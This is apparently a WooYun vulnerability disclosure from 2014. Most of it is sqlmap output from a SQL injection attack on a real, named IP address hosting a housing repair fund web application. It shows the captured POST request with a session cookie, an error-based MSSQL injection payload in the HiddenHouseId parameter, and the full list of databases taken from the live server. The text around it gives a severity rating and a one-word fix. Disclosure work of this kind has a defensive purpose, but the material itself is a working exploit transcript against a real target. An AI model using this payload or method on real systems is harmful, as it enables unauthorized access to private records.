[09:36:15] [INFO] fetching database names
[09:36:15] [INFO] fetching number of databases
[09:36:15] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[09:37:18] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
4
[09:37:59] [INFO] adjusting time delay to 4 seconds due to good response times
6
[09:38:30] [INFO] retrieved: ASPStat
[09:45:15] [INFO] adjusting time delay to 3 seconds due to good response times
e
[09:46:36] [INFO] retrieved: baobiao
[09:53:21] [INFO] retrieved: house
[09:58:35] [INFO] retrieved: House_DzdaImg1
[10:11:43] [INFO] retrieved: House_DzdaI
[10:22:32] [ERROR] invalid character detected. retrying..
[10:22:32] [WARNING] increasing time delay to 4 seconds
mg10
[10:26:58] [INFO] retrieved: House_DzdaImg11
[10:41:45] [INFO] retrieved: House_DzdaImg1
5、POST /Wxzj/RepairQuery/OwnerSearchByName.aspx HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://221.10.67.197/Wxzj/RepairQuery/OwnerSearchByName.aspx
Content-Length: 785
Content-Type: application/x-www-form-urlencoded
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: ASP.NET_SessionId=srddyba53ludf255w44xecrf
Host: 221.10.67.197
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
BtnShowOneOwnerInfo=Button&hcurMoney=0.00&hfirstPayMoney=0.00&HiddenHouseId=1&hiddenId=&hplusMoney=0.00&hsendPayMoney=0.00&htotalAccrual=0.00&huseableMoney=0.00&huseMoney=0.00&IBtnSearchOK=&time=1&TxtAuto=1&TxtHouseId=1&TxtIdNum=1&TxtReal=1&TxtType=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWEgK1jY7CDgK/1IjCDgL5%2bLqdCQLIr5/ACALQysnjAwLPj%2b2oDwKo3LqNCQLKzcyPAwLo2pbPDwLD7cCLBAKZ2fb4DQLR65XlBwKH3dr3AgKr8LPlDwLag5fDCQLl7LSbDAKsjPiFBgKFuZQeTamt6G1z5%2bOyrqwqEBhs4hfVisk%3d&__VIEWSTATE=/wEPDwULLTExNjY0NjA0NzQPFgIeBFVzZXJkFgICAw9kFgQCAw9kFgJmDxUBGOe7tOS/rui1hOmHkeS4muS4u%2bafpeivomQCEw9kFgJmD2QWCgIXDxYCHgtfIUl0ZW1Db3VudGZkAh8PFgIfAWZkAiMPFgIfAWZkAicPFgIfAWZkAisPFgIfAWZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxJQnRuU2VhcmNoT0uToP6%2bZv77PjBNc7R5AQNJwm86qQ%3d%3d
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: HiddenHouseId
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: BtnShowOneOwnerInfo=Button&hcurMoney=0.00&hfirstPayMoney=0.00&Hidde
nHouseId=1') AND 4626=CONVERT(INT,(CHAR(58)+CHAR(122)+CHAR(100)+CHAR(97)+CHAR(58
)+(SELECT (CASE WHEN (4626=4626) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR
(103)+CHAR(120)+CHAR(115)+CHAR(58))) AND ('EHZS'='EHZS&hiddenId=&hplusMoney=0.00
&hsendPayMoney=0.00&htotalAccrual=0.00&huseableMoney=0.00&huseMoney=0.00&IBtnSea
rchOK=&time=1&TxtAuto=1&TxtHouseId=1&TxtIdNum=1&TxtReal=1&TxtType=1&__EVENTARGUM
ENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWEgLd9+nDBQK/1IjCDgL5+LqdCQLIr5/ACALQys
njAwLPj+2oDwKo3LqNCQLKzcyPAwLo2pbPDwLD7cCLBAKZ2fb4DQLR65XlBwKH3dr3AgKr8LPlDwLag5
fDCQLl7LSbDAKsjPiFBgKFuZQeAQGG6wKrTKTu6HUfjksiL4m4xHE=&__VIEWSTATE=/wEPDwULLTExN
jY0NjA0NzQPFgIeBFVzZXJkFgICAw9kFgQCAw9kFgJmDxUBGOe7tOS/rui1hOmHkeS4muS4u+afpeivo
mQCEw9kFgJmD2QWCgIXDxYCHgtfIUl0ZW1Db3VudGZkAh8PFgIfAWZkAiMPFgIfAWZkAicPFgIfAWZkA
isPFgIfAWZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQxJQnRuU2VhcmNoT0uNc
F4ENH7hIoFBuwamC0W4foylvA==
---
[10:35:20] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
[10:35:21] [INFO] fetching database names
[10:35:25] [INFO] the SQL query used returns 33 entries
[10:35:32] [WARNING] reflective value(s) found and filtering out
[10:39:05] [INFO] retrieved: repairhousefund
[10:39:11] [INFO] retrieved: master
[10:39:16] [INFO] retrieved: tempdb
[10:39:21] [INFO] retrieved: model
[10:39:26] [INFO] retrieved: msdb
[10:39:31] [INFO] retrieved: ReportServer
[10:39:36] [INFO] retrieved: ReportServerTempDB
[10:39:41] [INFO] retrieved: ASPState
[10:39:46] [INFO] retrieved: House
[10:39:51] [INFO] retrieved: House_DzdaImg1
[10:39:56] [INFO] retrieved: House_DzdaImg10
[10:40:00] [INFO] retrieved: House_Eval
[10:40:06] [INFO] retrieved: zfbz
[10:40:10] [INFO] retrieved: ZLGL
[10:40:16] [INFO] retrieved: HouseFGJ
[10:40:21] [INFO] retrieved: repairhousefund
[10:40:26] [INFO] retrieved: House_DzdaImg11
[10:40:31] [INFO] retrieved: Lz_Zl
[10:40:36] [INFO] retrieved: House_DzdaImg12
[10:40:41] [INFO] retrieved: distribution
[10:40:46] [INFO] retrieved: House_DzdaImg13
[10:40:51] [INFO] retrieved: House_DzdaImg14
[10:40:56] [INFO] retrieved: House_DzdaImg15
[10:41:01] [INFO] retrieved: House_DzdaImg2
[10:41:06] [INFO] retrieved: House_DzdaImg3
[10:41:11] [INFO] retrieved: house_pg
[10:41:16] [INFO] retrieved: House_DzdaImg4
[10:41:21] [INFO] retrieved: House_DzdaImg5
[10:41:25] [INFO] retrieved: house_wz
[10:41:30] [INFO] retrieved: House_DzdaImg6
[10:41:35] [INFO] retrieved: House_DzdaImg7
[10:41:40] [INFO] retrieved: House_DzdaImg8
[10:41:45] [INFO] retrieved: House_DzdaImg9
[10:41:50] [INFO] retrieved: House_TelInfo
[10:41:55] [INFO] retrieved:
available databases [34]:
[*] ASPState
[*] distribution
[*] House
[*] House_DzdaImg1
[*] House_DzdaImg10
[*] House_DzdaImg11
[*] House_DzdaImg12
[*] House_DzdaImg13
[*] House_DzdaImg14
[*] House_DzdaImg15
[*] House_DzdaImg2
[*] House_DzdaImg3
[*] House_DzdaImg4
[*] House_DzdaImg5
[*] House_DzdaImg6
[*] House_DzdaImg7
[*] House_DzdaImg8
[*] House_DzdaImg9
[*] House_Eval
[*] house_pg
[*] House_TelInfo
[*] house_wz
[*] HouseFGJ
[*] Lz_Zl
[*] master
[*] model
[*] msdb
[*] repairhousefund
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] zfbz
[*] ZLGL

漏洞证明:

已经证明

修复方案:

过滤

版权声明:转载请注明来源 Mr.leo@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2014-10-16 09:06

厂商回复:

最新状态:

暂无


漏洞评价:

评论